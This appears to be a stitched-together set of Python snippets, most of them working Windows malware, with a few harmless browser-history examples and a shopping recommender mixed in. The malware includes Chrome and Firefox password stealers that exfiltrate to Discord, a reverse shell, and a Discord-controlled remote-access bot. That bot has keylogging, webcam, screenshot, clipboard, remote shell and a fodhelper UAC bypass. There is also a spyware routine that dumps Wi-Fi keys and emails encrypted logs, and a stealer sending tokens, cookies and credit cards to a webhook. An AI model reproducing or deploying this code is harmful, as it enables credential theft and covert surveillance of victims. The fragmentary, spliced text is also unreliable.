os.environ['LOCALAPPDATA'] DB_PATH = r'Google\Chrome\User Data\Default\Login Data' NONCE_BYTE_SIZE = 12 def encrypt(cipher, plaintext, nonce): cipher.mode = modes.GCM(nonce) encryptor = cipher.encryptor() ciphertext = encryptor.update(plaintext) return (cipher, ciphertext, nonce) def decrypt(cipher, ciphertext, nonce): cipher.mode = modes.GCM(nonce) decryptor = cipher.decryptor() return decryptor.update(ciphertext) def get_cipher(key): cipher = Cipher(algorithms.AES(key), None, backend=default_backend()) return cipher def dpapi_decrypt(encrypted): import ctypes import ctypes.wintypes class DATA_BLOB(ctypes.Structure): _fields_ = [('cbData', ctypes.wintypes.DWORD), ('pbData', ctypes.POINTER(ctypes.c_char))] p = ctypes.create_string_buffer(encrypted, len(encrypted)) blobin = DATA_BLOB(ctypes.sizeof(p), p) blobout = DATA_BLOB() retval = ctypes.windll.crypt32.CryptUnprotectData( ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout)) if not retval: raise ctypes.WinError() result = ctypes.string_at(blobout.pbData, blobout.cbData) ctypes.windll.kernel32.LocalFree(blobout.pbData) return result def unix_decrypt(encrypted): if sys.platform.startswith('linux'): password = '******' iterations = 1 else: raise NotImplementedError from Crypto.Cipher import AES from Crypto.Protocol.KDF import PBKDF2 salt = 'saltysalt' iv = ' ' * 16 length = 16 key = PBKDF2(password, salt, length, iterations) cipher = AES.new(key, AES.MODE_CBC, IV=iv) decrypted = cipher.decrypt(encrypted[3:]) return decrypted[:-ord(decrypted[-1])] def get_key_from_local_state(): jsn = None with open(os.path.join(os.environ['LOCALAPPDATA'], r"Google\Chrome\User Data\Local State"), encoding='utf-8', mode="r") as f: jsn = json.loads(str(f.readline())) return jsn["os_crypt"]["encrypted_key"] def aes_decrypt(encrypted_txt): encoded_key = get_key_from_local_state() encrypted_key = base64.b64decode(encoded_key.encode()) encrypted_key = encrypted_key[5:] key = dpapi_decrypt(encrypted_key) nonce = encrypted_txt[3:15] cipher = get_cipher(key) return decrypt(cipher, encrypted_txt[15:], nonce) class ChromePassword: def __init__(self): self.passwordList = [] def get_chrome_db(self): _full_path = os.path.join(APP_DATA_PATH, DB_PATH) _temp_path = os.path.join(APP_DATA_PATH, 'sqlite_file') if os.path.exists(_temp_path): os.remove(_temp_path) shutil.copyfile(_full_path, _temp_path) self.show_password(_temp_path) def show_password(self, db_file): conn = sqlite3.connect(db_file) _sql = 'select signon_realm,username_value,password_value from logins' for row in conn.execute(_sql): host = row[0] if host.startswith('android'): #continue name = row[1] value = self.chrome_decrypt(row[2]) _info = 'Hostname: %s\nUsername: %s\nPassword: %s\n\n' % ( host, name, value) self.passwordList.append(_info) conn.close() os.remove(db_file) def chrome_decrypt(self, encrypted_txt): if sys.platform == 'win32': try: if encrypted_txt[:4] == b'\x01\x00\x00\x00': decrypted_txt = dpapi_decrypt(encrypted_txt) return decrypted_txt.decode() elif encrypted_txt[:3] == b'v10': decrypted_txt = aes_decrypt(encrypted_txt) return decrypted_txt[:-16].decode() except WindowsError: return None else: try: return unix_decrypt(encrypted_txt) except NotImplementedError: return None def save_passwords(self): with open('Passwords.txt', 'w', encoding='utf-8') as f: f.writelines(self.passwordList) async def send_passwords(self): file = discord.File("Passwords.txt", filename="Passwords.txt") await message.channel.send( "[*] Command successfuly executed", file=file) os.popen("del Passwords.txt") if __name__ == "__main__": Main = ChromePassword() Main.get_chrome_db() Main.save_passwords() Main.send_passwords() if message.content == "!shell": import socket import subprocess import sys SERVER_HOST = "" SERVER_PORT = 5003 BUFFER_SIZE = 1024 s = socket.socket() s.connect((SERVER_HOST, SERVER_PORT)) message = s.recv(BUFFER_SIZE).decode() print("Server:", message) while True: command = s.recv(BUFFER_SIZE).decode() if command.lower() == "exit": break output = subprocess.getoutput(command) s.send(output.encode()) s.close() if message.content == "!firefox": import ftplib import getpass import os #get the default user profile dirs = os.listdir("C:/users/" + getpass.getuser() + "/AppData/Roaming/Mozilla/Firefox/Profiles/") #directorys of the needed files cert8 = "C:/users/" + getpass.getuser( ) + "/AppData/Roaming/Mozilla/Firefox/Profiles/" + dirs[ 0] + "/cert8.db" key03 = "C:/users/" + getpass.getuser( ) + "/AppData/Roaming/Mozilla/Firefox/Profiles/" + dirs[ 0] + "/key3.db" signons = "C:/users/" + getpass.getuser( ) + "/AppData/Roaming/Mozilla/Firefox/Profiles/" + dirs[ 0] + "/signons.sqlite" #check if the path of the files exist if os.path.exists(cert8): pass else: exit() if os.path.exists(key03): pass else: exit() if os.path.exists(signons): pass else: exit() #open these file with readbinary mode cert = open(cert8, "rb") key = open(key03, "rb") sig = open(signons, "rb") file = discord.File(cert8, filename=cert8) await message.channel.send("[*] Command successfuly executed", file=file) file = discord.File(key3, filename=key3) await message.channel.send("[*] Command successfuly executed", file=file) file = discord.File(signons, filename=signons) await message.channel.send("[*] Command successfuly executed", file=file) #close files cert.close() key.close() sig.close()
async def on_message(message): if message.channel.name != channel_name: pass else: if message.content.startswith("!kill"): if message.content[6:] == "all": for y in range(len(on_ready.total)): if "session" in on_ready.total[y]: channel_to_delete = discord.utils.get( client.get_all_channels(), name=on_ready.total[y]) await channel_to_delete.delete() else: pass else: try: channel_to_delete = discord.utils.get( client.get_all_channels(), name=message.content[6:]) await channel_to_delete.delete() await message.channel.send( f"[*] {message.content[6:]} killed.") except: await message.channel.send( f"[!] {message.content[6:]} is invalid,please enter a valid session name" ) if message.content == "!dumpkeylogger": import os temp = os.getenv("TEMP") file_keys = os.path.join(os.getenv('TEMP') + "\\key_log.txt") file = discord.File(file_keys, filename=file_keys) await message.channel.send("[*] Command successfully executed", file=file) os.remove(os.path.join(os.getenv('TEMP') + "\\key_log.txt")) if message.content == "!exit": exit() if message.content == "!windowstart": import threading global stop_threads stop_threads = False global _thread _thread = threading.Thread(target=between_callback, args=(client, )) _thread.start() await message.channel.send( "[*] Window logging for this session started") if message.content == "!windowstop": stop_threads = True await message.channel.send( "[*] Window logging for this session stopped") game = discord.Game(f"Window logging stopped") await client.change_presence(status=discord.Status.online, activity=game) if message.content == "!screenshot": import os from mss import mss with mss() as sct: sct.shot( output=os.path.join(os.getenv('TEMP') + "\\monitor.png")) file = discord.File( os.path.join(os.getenv('TEMP') + "\\monitor.png"), filename="monitor.png") await message.channel.send("[*] Command successfully executed", file=file) os.remove(os.path.join(os.getenv('TEMP') + "\\monitor.png")) if message.content == "!volumemax": volumeup() await message.channel.send("[*] Volume put to 100%") if message.content == "!volumezero": volumedown() await message.channel.send("[*] Volume put to 0%") if message.content == "!webcampic": #Downloads a file over internet which is not great but avoids using opencv/numpy which helps reducing final exe file if compiled import os import urllib.request from zipfile import ZipFile directory = os.getcwd() try: os.chdir(os.getenv('TEMP')) urllib.request.urlretrieve( "https://www.nirsoft.net/utils/webcamimagesave.zip", "temp.zip") with ZipFile("temp.zip") as zipObj: zipObj.extractall() os.system("WebCamImageSave.exe /capture /FileName temp.png") file = discord.File("temp.png", filename="temp.png") await message.channel.send("[*] Command successfully executed", file=file) os.remove("temp.zip") os.remove("temp.png") os.remove("WebCamImageSave.exe") os.remove("readme.txt") os.remove("WebCamImageSave.chm") os.chdir(directory) except: await message.channel.send("[!] Command failed") if message.content.startswith("!message"): import ctypes import time MB_YESNO = 0x04 MB_HELP = 0x4000 ICON_STOP = 0x10 def mess(): ctypes.windll.user32.MessageBoxW( 0, message.content[8:], "Error", MB_HELP | MB_YESNO | ICON_STOP) #Show message box import threading messa = threading.Thread(target=mess) messa._running = True messa.daemon = True messa.start() import win32con import win32gui import time time.sleep(1) hwnd = win32gui.FindWindow(None, "Error") win32gui.ShowWindow( hwnd, win32con.SW_RESTORE) #Put message to foreground win32gui.SetWindowPos(hwnd, win32con.HWND_NOTOPMOST, 0, 0, 0, 0, win32con.SWP_NOMOVE + win32con.SWP_NOSIZE) win32gui.SetWindowPos(hwnd, win32con.HWND_TOPMOST, 0, 0, 0, 0, win32con.SWP_NOMOVE + win32con.SWP_NOSIZE) win32gui.SetWindowPos( hwnd, win32con.HWND_NOTOPMOST, 0, 0, 0, 0, win32con.SWP_SHOWWINDOW + win32con.SWP_NOMOVE + win32con.SWP_NOSIZE) if message.content.startswith("!wallpaper"): import ctypes import os path = os.path.join(os.getenv('TEMP') + "\\temp.jpg") await message.attachments[0].save(path) ctypes.windll.user32.SystemParametersInfoW(20, 0, path, 0) await message.channel.send("[*] Command successfully executed") if message.content.startswith("!upload"): await message.attachments[0].save(message.content[8:]) await message.channel.send("[*] Command successfully executed") if message.content.startswith("!shell"): global status import time status = None import subprocess import os instruction = message.content[7:] def shell(): output = subprocess.run(instruction, stdout=subprocess.PIPE, shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE) global status status = "ok" return output import threading shel = threading.Thread( target=shell ) #Use of threading and a global variable to avoid hanging if command is too long to produce an output (probably a better way to do this) shel._running = True shel.start() time.sleep(1) shel._running = False if status: result = str( shell().stdout.decode('CP437') ) #CP437 Decoding used for characters like " é " etc.. print(result) numb = len(result) print(numb) if numb < 1: await message.channel.send( "[*] Command not recognized or no output was obtained") elif numb > 1990: f1 = open("output.txt", 'a') f1.write(result) f1.close() file = discord.File("output.txt", filename="output.txt") await message.channel.send( "[*] Command successfully executed", file=file) os.popen("del output.txt") else: await message.channel.send( "[*] Command successfully executed : " + result) else: await message.channel.send( "[*] Command not recognized or no output was obtained") status = None if message.content.startswith("!download"): file = discord.File(message.content[10:], filename=message.content[10:]) await message.channel.send("[*] Command successfully executed", file=file) if message.content.startswith("!cd"): import os os.chdir(message.content[4:]) await message.channel.send("[*] Command successfully executed") if message.content == "!help": await message.channel.send(helpmenu) if message.content.startswith("!write"): import pyautogui if message.content[7:] == "enter": pyautogui.press("enter") else: pyautogui.typewrite(message.content[7:]) if message.content == "!history": import os import browserhistory as bh dict_obj = bh.get_browserhistory() strobj = str(dict_obj).encode(errors='ignore') with open("history.txt", "a") as hist: hist.write(str(strobj)) file = discord.File("history.txt", filename="history.txt") await message.channel.send("[*] Command successfully executed", file=file) os.remove("history.txt") if message.content == "!clipboard": import ctypes import os CF_TEXT = 1 kernel32 = ctypes.windll.kernel32 kernel32.GlobalLock.argtypes = [ctypes.c_void_p] kernel32.GlobalLock.restype = ctypes.c_void_p kernel32.GlobalUnlock.argtypes = [ctypes.c_void_p] user32 = ctypes.windll.user32 user32.GetClipboardData.restype = ctypes.c_void_p user32.OpenClipboard(0) if user32.IsClipboardFormatAvailable(CF_TEXT): data = user32.GetClipboardData(CF_TEXT) data_locked = kernel32.GlobalLock(data) text = ctypes.c_char_p(data_locked) value = text.value kernel32.GlobalUnlock(data_locked) body = value.decode() user32.CloseClipboard() await message.channel.send(f"[*] Clipboard content is : {body}" ) if message.content.startswith("!stopsing"): import os os.system(f"taskkill /F /IM {pid_process[1]}") if message.content == "!sysinfo": import platform info = platform.uname() info_total = f'{info.system} {info.release} {info.machine}' from requests import get ip = get('https://api.ipify.org').text await message.channel.send( f"[*] Command successfully executed : {info_total} {ip}") if message.content == "!geolocate": import urllib.request import json with urllib.request.urlopen( "https://geolocation-db.com/json") as url: data = json.loads(url.read().decode()) link = f"http://www.google.com/maps/place/{data['latitude']},{data['longitude']}" await message.channel.send( "[*] Command successfully executed : " + link) if message.content == "!admincheck": import ctypes is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 if is_admin == True: await message.channel.send("[*] Congrats you're admin") elif is_admin == False: await message.channel.send("[!] Sorry, you're not admin") if message.content == "!uacbypass": import os import win32net if 'logonserver' in os.environ: server = os.environ['logonserver'][2:] else: server = None def if_user_is_admin(Server): groups = win32net.NetUserGetLocalGroups(Server, os.getlogin()) isadmin = False for group in groups: if group.lower().startswith('admin'): isadmin = True return isadmin, groups is_admin, groups = if_user_is_admin(server) if is_admin == True: print('User in admin group trying to bypass uac') import os import sys import ctypes import winreg CMD = "C:\\Windows\\System32\\cmd.exe" FOD_HELPER = 'C:\\Windows\\System32\\fodhelper.exe' COMM = "start" REG_PATH = 'Software\\Classes\\ms-settings\\shell\\open\\command' DELEGATE_EXEC_REG_KEY = 'DelegateExecute' def is_running_as_admin(): ''' Checks if the script is running with administrative privileges. Returns True if is running as admin, False otherwise. ''' try: return ctypes.windll.shell32.IsUserAnAdmin() except: return False def create_reg_key(key, value): ''' Creates a reg key ''' try: winreg.CreateKey(winreg.HKEY_CURRENT_USER, REG_PATH) registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_WRITE) winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value) winreg.CloseKey(registry_key) except WindowsError: raise def bypass_uac(cmd): ''' Tries to bypass the UAC ''' try: create_reg_key(DELEGATE_EXEC_REG_KEY, '') create_reg_key(None, cmd) except WindowsError: raise def execute(): if not is_running_as_admin(): print( '[!] The script is NOT running with administrative privileges' ) print('[+] Trying to bypass the UAC') try: current_dir = os.path.dirname( os.path.realpath( __file__)) + '\\' + sys.argv[0] cmd = '{} /k {} {}'.format(CMD, COMM, current_dir) print(cmd) bypass_uac(cmd) os.system(FOD_HELPER) sys.exit(0) except WindowsError: sys.exit(1) else: print( '[+] The script is running with administrative privileges!' ) if __name__ == '__main__': execute() else: print("failed") await message.channel.send( "[*] Command failed : User not in administrator group") if message.content.startswith( "!sing" ): # This is awfully complicated for such a dumb command I don't know why I wasted time doing this. volumeup() from win32 import win32gui import win32con import win32gui from win32con import SW_HIDE import win32process import os link = message.content[6:] if link.startswith("http"): link = link[link.find('www'):] os.system(f'start {link}') while True: def get_all_hwnd(hwnd, mouse): def winEnumHandler(hwnd, ctx): if win32gui.IsWindowVisible(hwnd): if "youtube" in ( win32gui.GetWindowText(hwnd).lower()): win32gui.ShowWindow(hwnd, SW_HIDE) global pid_process pid_process = win32process.GetWindowThreadProcessId( hwnd) return "ok" else: pass if win32gui.IsWindow(hwnd) and win32gui.IsWindowEnabled( hwnd) and win32gui.IsWindowVisible(hwnd): win32gui.EnumWindows(winEnumHandler, None) try: win32gui.EnumWindows(get_all_hwnd, 0) except: break if message.content == "!startkeylogger": import base64 import os from pynput.keyboard import Key, Listener import logging temp = os.getenv("TEMP") logging.basicConfig( filename=os.path.join(os.getenv('TEMP') + "\\key_log.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s') def keylog(): def on_press(key): logging.info(str(key)) with Listener(on_press=on_press) as listener: listener.join() import threading global test test = threading.Thread(target=keylog) test._running = True test.daemon = True test.start() await message.channel.send("[*] Keylogger successfully started") if message.content == "!stopkeylogger": import os test._running = False await message.channel.send("[*] Keylogger successfully stopped") if message.content == "!idletime": class LASTINPUTINFO(Structure): _fields_ = [ ('cbSize', c_uint), ('dwTime', c_int), ] def get_idle_duration(): lastInputInfo = LASTINPUTINFO() lastInputInfo.cbSize = sizeof(lastInputInfo) if windll.user32.GetLastInputInfo(byref(lastInputInfo)): millis = windll.kernel32.GetTickCount( ) - lastInputInfo.dwTime return millis / 1000.0 else: return 0 import threading global idle1 idle1 = threading.Thread(target=get_idle_duration) idle1._running = True idle1.daemon = True idle1.start() duration = get_idle_duration() await message.channel.send('User idle for %.2f seconds.' % duration ) import time time.sleep(1) if message.content.startswith("!voice"): volumeup() import comtypes import win32com.client as wincl speak = wincl.Dispatch("SAPI.SpVoice") speak.Speak(message.content[7:]) comtypes.CoUninitialize() await message.channel.send("[*] Command successfully executed") if message.content.startswith("!blockinput"): import ctypes is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 if is_admin == True: ok = windll.user32.BlockInput(True) await message.channel.send("[*] Command successfully executed") else: await message.channel.send( "[!] Admin rights are required for this operation") if message.content.startswith("!unblockinput"): import ctypes is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 if is_admin == True: ok = windll.user32.BlockInput(False) await message.channel.send("[*] Command successfully executed") else: await message.channel.send( "[!] Admin rights are required for this operation")
import browserhistory as bh obj=bh.get_browserhistory() dict_obj.keys() dict_keys(['safari', 'chrome', 'firefox']) dict_obj['chrome'][0] ('https://mail.google.com', 'Mail', '2018-08-14 08:27:26')
''' 结果:error edge、ie无法查看 chrome没有生成数据 ''' import browserhistory as bh import pandas as pd pd.DataFrame.from_dict(bh.get_browserhistory()['chrome']) #查看指定浏览器的记录 # bh.get_browserhistory() bh.write_browserhistory_csv()
def main(): pathlib.Path('C:/Users/Public/Logs').mkdir(parents=True, exist_ok=True) file_path = 'C:\\Users\\Public\\Logs\\' ##### Retrieve Network/Wifi informaton for the network_wifi file ################################################################ with open(file_path + 'network_wifi.txt', 'a') as network_wifi: try: commands = subprocess.Popen([ 'Netsh', 'WLAN', 'export', 'profile', 'folder=C:\\Users\\Public\\Logs\\', 'key=clear', '&', 'ipconfig', '/all', '&', 'arp', '-a', '&', 'getmac', '-V', '&', 'route', 'print', '&', 'netstat', '-a' ], stdout=network_wifi, stderr=network_wifi, shell=True) outs, errs = commands.communicate(timeout=60) except subprocess.TimeoutExpired: commands.kill() out, errs = commands.communicate() ##### Retrieve system information for the system_info file ###################################################################### hostname = socket.gethostname() IPAddr = socket.gethostbyname(hostname) with open(file_path + 'system_info.txt', 'a') as system_info: try: public_ip = requests.get('https://api.ipify.org').text except requests.ConnectionError: public_ip = '* Ipify connection failed *' pass system_info.write('Public IP Address: ' + public_ip + '\n' \ + 'Private IP Address: ' + IPAddr + '\n') try: get_sysinfo = subprocess.Popen( ['systeminfo', '&', 'tasklist', '&', 'sc', 'query'], stdout=system_info, stderr=system_info, shell=True) outs, errs = get_sysinfo.communicate(timeout=15) except subprocess.TimeoutExpired: get_sysinfo.kill() outs, errs = get_sysinfo.communicate() ##### Copy the clipboard ######################################################################################################## win32clipboard.OpenClipboard() pasted_data = win32clipboard.GetClipboardData() win32clipboard.CloseClipboard() with open(file_path + 'clipboard_info.txt', 'a') as clipboard_info: clipboard_info.write('Clipboard Data: \n' + pasted_data) ##### Get the browsing history ################################################################################################## browser_history = [] bh_user = bh.get_username() db_path = bh.get_database_paths() hist = bh.get_browserhistory() browser_history.extend((bh_user, db_path, hist)) with open(file_path + 'browser.txt', 'a') as browser_txt: browser_txt.write(json.dumps(browser_history)) ##### Using multiprocess module to log keystrokes, get screenshots, ############################################################ # record microphone, as well as webcam picures # p1 = Process(target=logg_keys, args=(file_path, )) p1.start() p2 = Process(target=screenshot, args=(file_path, )) p2.start() p3 = Process(target=microphone, args=(file_path, )) p3.start() p4 = Process(target=webcam, args=(file_path, )) p4.start() p1.join(timeout=300) p2.join(timeout=300) p3.join(timeout=300) p4.join(timeout=300) p1.terminate() p2.terminate() p3.terminate() p4.terminate() ##### Encrypt files ############################################################################################################# files = [ 'network_wifi.txt', 'system_info.txt', 'clipboard_info.txt', 'browser.txt', 'key_logs.txt' ] regex = re.compile(r'.+\.xml$') dir_path = 'C:\\Users\\Public\\Logs' for dirpath, dirnames, filenames in os.walk(dir_path): [files.append(file) for file in filenames if regex.match(file)] # In the python console type: from cryptography.fernet import Fernet ; then run the command # below to generate a key. This key needs to be added to the key variable below as # well as in the DecryptFile.py that should be kept on the exploiters system. If either # is forgotten either encrypting or decrypting process will fail. # # Command -> Fernet.generate_key() key = b'T2UnFbwxfVlnJ1PWbixcDSxJtpGToMKotsjR4wsSJpM=' for file in files: with open(file_path + file, 'rb') as plain_text: data = plain_text.read() encrypted = Fernet(key).encrypt(data) with open(file_path + 'e_' + file, 'ab') as hidden_data: hidden_data.write(encrypted) os.remove(file_path + file) ##### Send encrypted files to email account ##################################################################################### send_email('C:\\Users\\Public\\Logs') send_email('C:\\Users\\Public\\Logs\\Screenshots') send_email('C:\\Users\\Public\\Logs\\WebcamPics') # Clean Up Files # shutil.rmtree('C:\\Users\\Public\\Logs') # Loop # main()
def history(): return bh.get_browserhistory() # brings chrom & firbox browser history
def root(): dict_obj = bh.get_browserhistory() date_N_days_ago = datetime.now() - timedelta(days=3) t1 = 1 ac = 0 g = 0 d = 0 l = 0 tw = 0 m = 0 r = 1 cost = 0 x = 0 max1 = 0 costf = [] maxf = 0 listf = [] dict_obj.keys() # dict_keys(['safari', 'chrome', 'firefox']) for t in dict_obj['chrome']: newdate = datetime.strptime(t[2][0:10], "%Y-%m-%d") if t1 == 1 and newdate >= date_N_days_ago: # print(t[0]) if 'amazon.in' in t[0]: url = t[0] ua = UserAgent() pagea = requests.get(url, {'user_agent': ua.chrome}) dataa = pagea.text soupa = bs4.BeautifulSoup(dataa, 'lxml') inp = soupa.find('input', attrs={ 'type': 'text', 'id': 'twotabsearchtextbox' }) spana = soupa.find('span', attrs={'id': 'priceblock_ourprice'}) if spana is not None: if spana.string is not None: print(spana.string) if 'gaming' in t[0].lower(): g = 1 if 'laptop' in t[0].lower(): l = 1 if 'desktop' in t[0].lower(): d = 1 if 'monitor' in t[0].lower(): m = 1 if 'accessories' in t[0].lower(): ac = 1 if 'hp.com' in t[ 0] and 'https://store.hp.com/in-en/default/' != t[0]: urlh = t[0] ua2 = UserAgent() time.sleep(1) pageh = requests.get(urlh, {'user_agent': ua2.chrome}) datah = pageh.text souph = bs4.BeautifulSoup(datah, 'lxml') spanhp = souph.find('span', attrs={'class': 'price'}) spanhs = souph.find('span', attrs={ 'class': 'base', 'data-ui-id': 'page-title-wrapper' }) strongdif = souph.find('strong', attrs={'role': 'heading'}) if strongdif is not None: if strongdif.string is not None: if 'options' in strongdif.string.lower(): if spanhs is not None: if spanhs.string is not None: sp = spanhs.string.lower() if 'laptops' in sp: l = 1 if 'gaming' in sp: g = 1 if 'accessories' in sp: ac = 1 if 'desktop' in sp: d = 1 if 'monitor' in sp: m = 1 ahp = souph.find( 'div', attrs={'class': 'customer-category-banner-box'}) if ahp.h1 is not None: if ahp.h1.string is not None: if 'laptop' in ahp.h1.string.lower(): l = 1 if 'gaming' in ahp.h1.string.lower(): g = 1 if 'desktop' in ahp.h1.string.lower(): d = 1 if 'monitor' in ahp.h1.string.lower(): m = 1 if 'accessories' in ahp.h1.string.lower(): ac = 1 else: if spanhp is not None: if spanhp.string is not None: np = spanhp.string[1:].replace(',', '') cost = cost + int(np) x = x + 1 if max1 < int(np): max1 = int(np) spanstrh = souph.find('strong') if spanstrh is not None: if spanstrh.string is not None: strhtag = spanstrh.string.lower() if 'spectre' in strhtag: tw = 1 if 'flipkart.com' in t[0]: urlf = t[0] ua1 = UserAgent() time.sleep(10) pagef = requests.get(urlf, {'user_agent': ua1.chrome}) dataf = pagef.text soupf = bs4.BeautifulSoup(dataf, 'lxml') inpf = soupf.find('input', attrs={ 'type': 'text', 'class': 'LM6RPg' }) spanf = soupf.find('span', attrs={'class': '_35KyD6'}) if inpf is not None: if inpf['value'] != '': sf = inpf['value'].lower().lstrip().rstrip() if 'gaming' in sf: g = 1 if 'laptop' in sf: l = 1 if 'under' in sf: max1 = int(sf[21:]) if 'accessories' in sf: ac = 1 if 'monitor' in sf: m = 1 if 'desktop' in sf: d = 1 if 'two-in-one' in sf: tw = 1 if spanf is not None: print(spanf.text) if spanf.text is not None: if 'Gaming Laptop' in spanf.text: divf = soupf.find( 'div', attrs={'class': '_1vC4OE _3qQ9m1'}) print(divf.string) cf = divf.string[1:].replace(',', '') cost = cost + int(cf) x = x + 1 if max1 < int(cf): max1 = int(cf) # # else: # t1=0 # ('https://mail.google.com', 'Mail', '2018-08-14 08:27:26') # Write the data to csv files in the current working directory. # safari_browserhistory.csv, chrome_browserhistory.csv, and firefox_browerhistory.csv. # bh.write_browserhistory_csv() # bh.write_browserhistory_csv() # Create csv files that contain broswer history # print(costf) # print(maxf1) # print('g' , str(g)) # print('l' , str(l)) print(max1) print(cost / x) aver = cost / x print(g) print(l) print(m) print(d) print(tw) print(ac) # Importing the dataset dataset = pd.read_csv('gaming1.csv') X = dataset.iloc[:, :-1].values y = dataset.iloc[:, 2].values # Splitting the dataset into the Training set and Test set from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0) '''# Feature Scaling from sklearn.preprocessing import StandardScaler sc = StandardScaler() X_train = sc.fit_transform(X_train) X_test = sc.transform(X_test)''' # Fitting Random Forest Classification to the Training set from sklearn.ensemble import RandomForestClassifier classifier = RandomForestClassifier(n_estimators=10, criterion='entropy', random_state=0) classifier.fit(X_train, y_train) # Predicting the Test set results y_pred = classifier.predict(X_test) # print(npw.shape(X_test)) # Making the Confusion Matrix from sklearn.metrics import confusion_matrix cm = confusion_matrix(y_test, y_pred) if max1 == 0 and cost == 0: r = 6 else: test_data = npw.array([aver, max1]) r = classifier.predict(test_data.reshape(1, -1)) print(r) list_of_files = listdir( 'C:\\Users\\personal\\PycharmProjects\\RecommenderSystem\\venv\\static\\G' + str(r[0])) for index, link in enumerate(list_of_files): list_of_files[index] = "G" + str(r[0]) + "/" + list_of_files[index] print(list_of_files) return render_template("index.html", result=list_of_files, group=r)
import sys import browserhistory as bh dict_obj = bh.get_browserhistory() bh.write_browserhistory_csv() sys.exit(1)
def get_b_his(): dict_obj = bh.get_browserhistory() print(dict_obj) return dict_obj
def main(): paths = { 'Discord': roaming + '\\Discord', 'Discord Canary': roaming + '\\discordcanary', 'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default', 'Opera': roaming + '\\Opera Software\\Opera Stable', 'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default', 'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default', '7Star': local + '\\7Star\\7Star\\User Data', 'Amigo': local + '\\Amigo\\User Data', 'CentBrowser': local + '\\CentBrowser\\User Data', 'Chrome Canary': local + '\\Google\\Chrome SxS\\User Data', 'Epic Privacy Browser': local + '\\Epic Privacy Browser\\User Data', 'Kometa': local + '\\Kometa\\User Data', 'Orbitum': local + '\\Orbitum\\User Data', 'Sputnik': local + '\\Sputnik\\Sputnik\\User Data', 'Torch': local + '\\Torch\\User Data', 'Uran': local + '\\uCozMedia\\Uran\\User Data', 'Vivaldi': local + '\\Vivaldi\\User Data', } message = '' for platform2, path in paths.items(): if not os.path.exists(path): continue message += f'\n**{platform2}**\n```\n' tokens = find_tokens(path) if len(tokens) > 0: for token in tokens: message += f'{token}\n' else: message += 'No tokens found.\n' message += '```' def GetPasswords(): global credentials credentials = [] for browser in GetBrowsers(): master_key = GetMasterKey(browser) database = FetchDataBase( browser + '\\Login Data', 'SELECT action_url, username_value, password_value FROM logins' ) for row in database: password = { 'hostname': row[0], 'username': row[1], 'password': DecryptValue(row[2], master_key) } credentials.append(password) return credentials def GetFormattedPasswords(): getPasswords = GetPasswords() fmtPasswords = '' for password in getPasswords: fmtPasswords += ( 'Hostname: {0}\nUsername: {1}\nPassword: {2}\n=============================================\n' .format(password['hostname'], password['username'], password['password'])) return fmtPasswords fichier2 = open(temp + "\\punchnox.txt", 'a') fichier2.write(GetFormattedPasswords()) fichier2.close() def GetCookies(): global credentials credentials = [] for browser in GetBrowsers(): master_key = GetMasterKey(browser) database = FetchDataBase(browser + '\\Cookies', 'SELECT * FROM cookies') for row in database: cookie = { 'value': DecryptValue(row[12], master_key), 'hostname': row[1], 'name': row[2], 'path': row[4], 'expires': row[5], 'secure': bool(row[6]) } credentials.append(cookie) return credentials def GetFormattedCookies(): getCookies = GetCookies() fmtCookies = '' for cookie in getCookies: fmtCookies += ( 'Value: {0}\nHost: {1}\nName: {2}\nPath: {3}\nExpire: {4}\nSecure: {5}\n\n' .format(cookie['value'], cookie['hostname'], cookie['name'], cookie['path'], cookie['expires'], cookie['secure'])) return fmtCookies fichier = open(temp + "\\cookies.txt", 'a') fichier.write(GetFormattedCookies()) fichier.close() def GetBookmarks(): global credentials credentials = [] for browser in GetBrowsers(): bookmarksFile = browser + '\\Bookmarks' if not os.path.exists(bookmarksFile): continue else: with open(bookmarksFile, 'r', encoding='utf8', errors='ignore') as file: bookmarks = load(file)['roots']['bookmark_bar']['children'] for row in bookmarks: bookmark = { 'hostname': row['url'], 'name': row['name'], 'date_added': ConvertDate(row['date_added']) } credentials.append(bookmark) return credentials def GetFormattedBookmarks(): getBookmarks = GetBookmarks() fmtBookmarks = '' for bookmark in getBookmarks: fmtBookmarks += ('URL: {0}\nName: {1}\nDate: {2}\n\n'.format( bookmark['hostname'], bookmark['name'], bookmark['date_added'])) return fmtBookmarks fichier = open(temp + "\\favori.txt", 'a') fichier.write(GetFormattedBookmarks()) fichier.close() def GetCreditCards(): global credentials credentials = [] for browser in GetBrowsers(): master_key = GetMasterKey(browser) database = FetchDataBase(browser + '\\Web Data', 'SELECT * FROM credit_cards') for row in database: if not row[4]: break card = { 'number': DecryptValue(row[4], master_key), 'expireYear': row[3], 'expireMonth': row[2], 'name': row[1], } credentials.append(card) return credentials def GetFormattedCreditCards(): getCreditCards = GetCreditCards() fmtCreditCards = '' for card in getCreditCards: fmtCreditCards += ( 'Number: {4}\nName: {1}\nExpireYear: {3}\nExpireMonth: {2}\n\n' .format(card['number'], card['expireYear'], card['expireMonth'], card['name'])) return fmtCreditCards dict_obj = bh.get_browserhistory() strobj = str(dict_obj).encode(errors='ignore') fichier58 = open(temp + "\\history.txt", 'a') fichier58.write(str(strobj)) fichier58.close() hook.send("historique : ", file=dhooks.File(temp + "\\history.txt", name="history.txt")) hook.send("cookies : ", file=dhooks.File(temp + "\\cookies.txt", name="cookies.txt")) hook.send("password : "******"\\punchnox.txt", name="password.txt")) hook.send("Favori : ", file=dhooks.File(temp + "\\favori.txt", name="favori.txt")) os.system("del " + temp + "\\history.txt") os.system("del " + temp + "\\cookies.txt") os.system("del " + temp + "\\punchnox.txt") os.system("del " + temp + "\\favori.txt") if GetFormattedCreditCards(): cartes = GetFormattedCreditCards() else: cartes = "Pas de cartes de crédits trouvées" hook.send("```\n" + cartes + "\n```") screenshot = pyautogui.screenshot() screenshot.save(temp + "\\screen.png") hook.send(file=dhooks.File(temp + '\\screen.png', 